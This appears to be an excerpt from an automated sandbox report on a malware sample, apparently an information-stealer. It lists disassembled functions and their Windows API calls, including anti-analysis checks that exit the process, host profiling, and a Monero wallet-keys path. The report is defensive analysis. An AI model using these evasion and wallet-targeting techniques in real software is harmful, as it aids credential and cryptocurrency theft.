Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 31cd18c42d3977d6c95dd5b80a7bd3e5117f1150fbd5383fb922016163c5e374
Instruction ID: 87dff5ed3e769f1e11fb9aad98d09ea99a1f1d5b4adeaa1c988f193628fe18b8
Opcode Fuzzy Hash: 31cd18c42d3977d6c95dd5b80a7bd3e5117f1150fbd5383fb922016163c5e374
Instruction Fuzzy Hash: 8A31F7B4A00218ABDB24CF54DC85BDDB7B4EB48704F1081D9FB09AB281D7706EC59F99

Function 003B8100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00F3EA38,00000000,?,003C0E2C,00000000,?,00000000), ref: 003B8130
RtlAllocateHeap.NTDLL(00000000), ref: 003B8137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 003B8158
wsprintfA.USER32 ref: 003B81AC

Strings

%d MB, xrefs: 003B81A3
@, xrefs: 003B814D

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2922868504-3474575989
Opcode ID: 24c765350f99352ae2156075c4aac6e1ef8cda04fc7b80f75636e513d85c6829
Instruction ID: 279eb4c92f89a02ab95297e9a6d61fb850860635b12dcc4e5d9904588ffffbf3
Opcode Fuzzy Hash: 24c765350f99352ae2156075c4aac6e1ef8cda04fc7b80f75636e513d85c6829
Instruction Fuzzy Hash: 302138B1E44258ABDB04DFD8CC49FAEBBB8FB44B04F104619F705BB680D77869058BA5

Function 003B83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003B8426
wsprintfA.USER32 ref: 003B8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 003B847B
RegCloseKey.ADVAPI32(00000000), ref: 003B848C
RegCloseKey.ADVAPI32(00000000), ref: 003B8499

Part of subcall function 003BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003BA7E6

RegQueryValueExA.KERNEL32(00000000,00F3E918,00000000,000F003F,?,00000400), ref: 003B84EC
lstrlen.KERNEL32(?), ref: 003B8501
RegQueryValueExA.KERNEL32(00000000,00F3EA80,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,003C0B34), ref: 003B8599
RegCloseKey.KERNEL32(00000000), ref: 003B8608
RegCloseKey.ADVAPI32(00000000), ref: 003B861A

Strings

%s\%s, xrefs: 003B844D

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: b84825a974326e3e8103b5c02c0e547e90d66fdcd26528d2c848d8eeedb13bb0
Instruction ID: 6cf58010d8b663aa99ebb3919baa2f4aacb11bc16dfc51fa1aa5def2ac3ad565
Opcode Fuzzy Hash: b84825a974326e3e8103b5c02c0e547e90d66fdcd26528d2c848d8eeedb13bb0
Instruction Fuzzy Hash: 8B211B71900218ABDB28DF64DC85FE9B7B9FB48704F00C1D8E6499A140DF716A85CFE4

Function 003B7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B76A4
RtlAllocateHeap.NTDLL(00000000), ref: 003B76AB
RegOpenKeyExA.KERNEL32(80000002,00F2BAC8,00000000,00020119,00000000), ref: 003B76DD
RegQueryValueExA.KERNEL32(00000000,00F3E900,00000000,00000000,?,000000FF), ref: 003B76FE
RegCloseKey.ADVAPI32(00000000), ref: 003B7708

Strings

Windows 11, xrefs: 003B76BD

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: b94fa1c252513f3dee37ac10182c289bf7930109bfccb60277ae47b878a01c4a
Instruction ID: f210d0d307463ba1707a2d9f95a2b657a150b10705b90cc025e4e465c9bb309b
Opcode Fuzzy Hash: b94fa1c252513f3dee37ac10182c289bf7930109bfccb60277ae47b878a01c4a
Instruction Fuzzy Hash: 4301A2B4A04208BBEB04DBF0DC8AFBDB7BCEB58704F104054FB44DB290EA70A9089B51

Function 003B7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B7734
RtlAllocateHeap.NTDLL(00000000), ref: 003B773B
RegOpenKeyExA.KERNEL32(80000002,00F2BAC8,00000000,00020119,003B76B9), ref: 003B775B
RegQueryValueExA.KERNEL32(003B76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 003B777A
RegCloseKey.ADVAPI32(003B76B9), ref: 003B7784

Strings

CurrentBuildNumber, xrefs: 003B7771

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: b4739cb3a1a5cc70ca6cf59314e80339ef28cae898b6216c1cb519431a61e7d0
Instruction ID: b8c195385cfc6019a4c91024d418dd3c4121b1206d616222a739f370ee003ae2
Opcode Fuzzy Hash: b4739cb3a1a5cc70ca6cf59314e80339ef28cae898b6216c1cb519431a61e7d0
Instruction Fuzzy Hash: BD0167B5A40348BBEB14DBF0DC8AFAEB7B8EB58704F004558FA45AB281DB706904DF51

Function 003B69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 003B9860: GetProcAddress.KERNEL32(76F70000,00F30498), ref: 003B98A1
Part of subcall function 003B9860: GetProcAddress.KERNEL32(76F70000,00F30408), ref: 003B98BA
Part of subcall function 003B9860: GetProcAddress.KERNEL32(76F70000,00F303C0), ref: 003B98D2
Part of subcall function 003B9860: GetProcAddress.KERNEL32(76F70000,00F305E8), ref: 003B98EA
Part of subcall function 003B9860: GetProcAddress.KERNEL32(76F70000,00F305D0), ref: 003B9903
Part of subcall function 003B9860: GetProcAddress.KERNEL32(76F70000,00F38788), ref: 003B991B
Part of subcall function 003B9860: GetProcAddress.KERNEL32(76F70000,00F25BB0), ref: 003B9933
Part of subcall function 003B9860: GetProcAddress.KERNEL32(76F70000,00F25C70), ref: 003B994C
Part of subcall function 003B9860: GetProcAddress.KERNEL32(76F70000,00F30618), ref: 003B9964
Part of subcall function 003B9860: GetProcAddress.KERNEL32(76F70000,00F305A0), ref: 003B997C
Part of subcall function 003B9860: GetProcAddress.KERNEL32(76F70000,00F30528), ref: 003B9995
Part of subcall function 003B9860: GetProcAddress.KERNEL32(76F70000,00F304B0), ref: 003B99AD
Part of subcall function 003B9860: GetProcAddress.KERNEL32(76F70000,00F25C90), ref: 003B99C5
Part of subcall function 003B9860: GetProcAddress.KERNEL32(76F70000,00F304C8), ref: 003B99DE

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Part of subcall function 003A11D0: ExitProcess.KERNEL32 ref: 003A1211

Part of subcall function 003A1160: GetSystemInfo.KERNEL32(?), ref: 003A116A
Part of subcall function 003A1160: ExitProcess.KERNEL32 ref: 003A117E

Part of subcall function 003A1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003A112B
Part of subcall function 003A1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 003A1132
Part of subcall function 003A1110: ExitProcess.KERNEL32 ref: 003A1143

Part of subcall function 003A1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 003A123E
Part of subcall function 003A1220: ExitProcess.KERNEL32 ref: 003A1294

Part of subcall function 003B6770: GetUserDefaultLangID.KERNEL32 ref: 003B6774

Part of subcall function 003A1190: ExitProcess.KERNEL32 ref: 003A11C6

Part of subcall function 003B7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003A11B7), ref: 003B7880
Part of subcall function 003B7850: RtlAllocateHeap.NTDLL(00000000), ref: 003B7887
Part of subcall function 003B7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003B789F

Part of subcall function 003B78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B7910
Part of subcall function 003B78E0: RtlAllocateHeap.NTDLL(00000000), ref: 003B7917
Part of subcall function 003B78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 003B792F

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00F38798,?,003C110C,?,00000000,?,003C1110,?,00000000,003C0AEF), ref: 003B6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003B6AE8
CloseHandle.KERNEL32(00000000), ref: 003B6AF9
Sleep.KERNEL32(00001770), ref: 003B6B04
CloseHandle.KERNEL32(?,00000000,?,00F38798,?,003C110C,?,00000000,?,003C1110,?,00000000,003C0AEF), ref: 003B6B1A
ExitProcess.KERNEL32 ref: 003B6B22

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2931873225-0
Opcode ID: 1a7e709a539be3eccddb1a71878d51319fa9814de5adb57156f1bc8086c9b52e
Instruction ID: 3e1fa63c6c3bd69a831a4c56d774d938c8047a45c78e8fbb33c6785e108069a7
Opcode Fuzzy Hash: 1a7e709a539be3eccddb1a71878d51319fa9814de5adb57156f1bc8086c9b52e
Instruction Fuzzy Hash: E4312D70900A08AADB0AFBF0DC97BEE7778EF54344F504518F352AA982DF746905D6A2

Function 003A99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003A99EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 003A9A11
LocalAlloc.KERNEL32(00000040,?), ref: 003A9A31
ReadFile.KERNEL32(000000FF,?,00000000,003A148F,00000000), ref: 003A9A5A
LocalFree.KERNEL32(003A148F), ref: 003A9A90
CloseHandle.KERNEL32(000000FF), ref: 003A9A9A

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 9107349cbee63278f3831f0ee75b77f40674add0bbc37f7b5010cafe29b20f07
Instruction ID: 11fe2fd621a56b8a8cca919a8a8155ee09afc4734317943c829e12bdbd83f111
Opcode Fuzzy Hash: 9107349cbee63278f3831f0ee75b77f40674add0bbc37f7b5010cafe29b20f07
Instruction Fuzzy Hash: 8D3129B4A00209EFDF15CFA4C885BAE77B9FF49300F10815AE915AB290D774AA45CFA1

Function 003B4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,00F3ECA8), ref: 003B47DB

Part of subcall function 003B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003B8E0B

lstrcat.KERNEL32(?,00000000), ref: 003B4801
lstrcat.KERNEL32(?,?), ref: 003B4820
lstrcat.KERNEL32(?,?), ref: 003B4834
lstrcat.KERNEL32(?,00F2AF10), ref: 003B4847
lstrcat.KERNEL32(?,?), ref: 003B485B
lstrcat.KERNEL32(?,00F3D3D0), ref: 003B486F

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

